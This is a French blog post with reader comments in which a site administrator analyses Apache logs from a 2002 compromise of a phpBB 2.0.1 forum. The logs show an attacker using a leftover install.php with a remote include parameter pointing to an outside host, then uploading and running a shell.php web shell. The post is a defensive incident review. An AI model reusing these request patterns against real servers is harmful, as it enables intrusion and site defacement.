En ce jour sombre, c’est ce matin que j’ai découvert un hack de tous les sites qui sont hébergés ici. Herueusement rien de grave, juste les index.php ont été remplacés.
Seulement voilà, il fallait trouver la faille qui a permis au méchant vilain pas beau de nous faire du tort.
Voici donc le cours d’analyse de logs apache par Axel:
200.163.8.140 - - [20/Dec/2002:01:33:48 +0100] "GET / HTTP/1.1" 200 6572 forums.axelgamecenter.com "http://www.alltheweb.com/search?q=%22powered+by+phpbb+2.0.1%22&c=web&cs=utf-8&o=930&l=any" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "-"
Notre hackeur a fait des recherches sur “Powered by phpBB 2.0.1” Il cherchait donc volontairement à hacker par le forum: phpBB doit souffrir d’une faille de sécurité importante. Je vais tâcher de la corriger le plus vite possible avec l’aide d’aevoc.
200.163.8.140 - - [20/Dec/2002:01:34:01 +0100] "GET /install.php?phpbb_root_dir=http://www.superwroger.hpg.ig.com.br/ HTTP/1.1" 200 1266 forums.axelgamecenter.com "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "-"
207.253.45.194 - - [20/Dec/2002:01:34:45 +0100] "GET / HTTP/1.1" 200 683 www.mahorosan.net "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "-"
Là notre ami “installe” un nouveau phpBB dans notre forum en se servant du sien sur sa bécane comme source (corrompue).
De toutes évidence à partir de ce moment là on peut dire que la faute me revient, ce fichier install.php aurait dû être effacé. Ca n’a pas été fait. J’en assume les conséquences.
200.163.8.140 - - [20/Dec/2002:01:36:01 +0100] "GET /shell.php HTTP/1.1" 200 13127 forums.axelgamecenter.com "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "-"
200.163.8.140 - - [20/Dec/2002:01:36:06 +0100] "POST /shell.php HTTP/1.1" 200 13605 forums.axelgamecenter.com "http://forums.axelgamecenter.com/shell.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "-"
Et c’est là qu’il a commencé à faire le batard en uploadant un script php qui lui a permis d’envoyer n’importe quelle commande UNIX au serveur web, à savoir déplacer, renommer, supprimer, copier des fichiers etc.
Ingénieux, non?
En tous cas c’est une belle leçon de sécurité pour moi
Bah surtout ce que je capte pas, c’est que tu dis qu’il est passé par le forum car il existait une faille dans phpBB . Mais il me semblais que sur tes conseils judicieux, nous etions passer sous Simple Machines, justement pour éviter ce genre de “menu problème” ???
Il a fait comment alors le gaillard ? Si on a pas de forum en phpBB ??
Encore une vieille version du forum sous php qui traine ?
On s’est peut être pas fait hacker, mais bon les vieux membres bidons qui sont là pour t’envoyer des messages perso pour le la pub de pr0n de merde… bof bof :106:
C’est rare, mais ça viens d’arriver sur le forum… je suppose que vous l’avez aussi.
Je m’en suis occupé ce matin, malheureusement on peut pas faire grand chose, peut-être migrer sous SMF 2 à la limite, mais encore… Vu l’utilisation du forum ça me fait un poil chier de dépenser autant d’énergie à réinstaller les mods, surtout que si y’a pas l’arcade ou le shop ou la shoutbox ou je ne sais quoi sui manque y’en a qui vont venir me dire “ouiiiin y’a plus ça sur le forum”, 'fin bref.